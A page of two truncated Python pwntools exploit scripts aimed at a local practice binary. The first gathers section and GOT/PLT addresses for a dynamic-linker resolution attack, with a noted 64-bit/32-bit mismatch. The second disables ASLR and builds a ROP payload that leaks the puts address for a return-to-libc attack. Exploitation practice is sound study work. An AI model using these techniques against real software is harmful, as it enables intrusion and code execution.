Пример #1
#!/usr/bin/env python3
from pwn import process, ELF, log, context, pause
from fastpwn import pack
# Process setup for the './lab' target. The comment block further down
# explains why the section addresses are kept as plain integers.
context(arch='amd64', os='linux', log_level='DEBUG')
binary = ELF('./lab')
p = binary.process()

# Presumably the distance from the overflowed buffer to the saved return
# address; its use is further down the script, outside this excerpt — confirm
# against the binary before relying on it.
offset = 112

# NOTE(review): context.arch is 'amd64', but every address below sits in the
# 0x0804xxxx range typical of a 32-bit, non-PIE layout. Deriving the values
# from the ELF (`context.binary = binary`) would avoid the hard-coded mismatch.

# Section addresses. PIE is disabled, so these are fixed at link time. They are
# deliberately left as ints rather than packed bytes: the script still needs to
# do integer arithmetic with them, and bytes cannot be used as offsets.
bss = 0x0804c028
plt = 0x08049030
rel_plt = 0x08048424
dynsym = 0x08048260
dynstr = 0x08048320

# The GOT slot and the PLT stub belonging to read().
got_read = 0x0804c010
plt_read = 0x08049050

# Stop and wait for the operator before anything is sent to the process.
log.info("")
log.warning("continue?")
log.info("")
pause()

# Echo the layout so the DEBUG log records exactly which addresses were used.
# Format strings are identical to the original one-per-line log calls.
_layout = (
    (".bss: \t%s", bss),
    (".plt: \t%s", plt),
    (".rel.plt: %s", rel_plt),
    (".dynsym:  %s", dynsym),
    (".dynstr:  %s", dynstr),
    ("GOT entry to read: %s", got_read),
    ("PLT entry to read: %s", plt_read),
)
for _fmt, _addr in _layout:
    log.info(_fmt % hex(_addr))

# Meaning not established in this excerpt; consumed further down the script.
stack = 0x300
Пример #2
#!/usr/bin/env python3
from pwn import ELF, process, context, log
from fastpwn import pack, aslr  # custom library :)
from sys import argv, exit
try:
    if len(argv) > 1 and argv[1] == "-l":
        if aslr.read():
            aslr.write("2")
        context(arch='amd64', os='linux', log_level='DEBUG')  # binary context
        binary = ELF("./lab")  # define our binary
        p = binary.process(env={'LD_PRELOAD': './libc.so.6'
                                })  # start our process and define enviroment

        libc = binary.libc  # name our libc object
        # we can statically find the addresses of the PLT and GOT within the binary
        # just in case you were too lazy to, here is the pwntools way to do it
        #
        # plt_puts=binary.plt['puts']
        # got_puts=binary.got['puts']
        # main_addr=binary.sym['main']

        pop_rdi = pack.pk64(0x00000000004011e3)
        got_puts = pack.pk64(0x00404018)
        plt_puts = pack.pk64(0x00401030)
        main_addr = pack.pk64(0x00401136)
        offset = 40
        leak_payload = b"A" * offset  # overwrite ret addr, main ret back to gadget
        leak_payload += pop_rdi  # next we use a gadget, rdi will be the first parameter
        leak_payload += got_puts  # pass the address of the puts() entry on the global offset table
        leak_payload += plt_puts  # then, call puts(), this will actuall call puts
        leak_payload += main_addr  # ret back to main, since we still want to overwrite the buffer again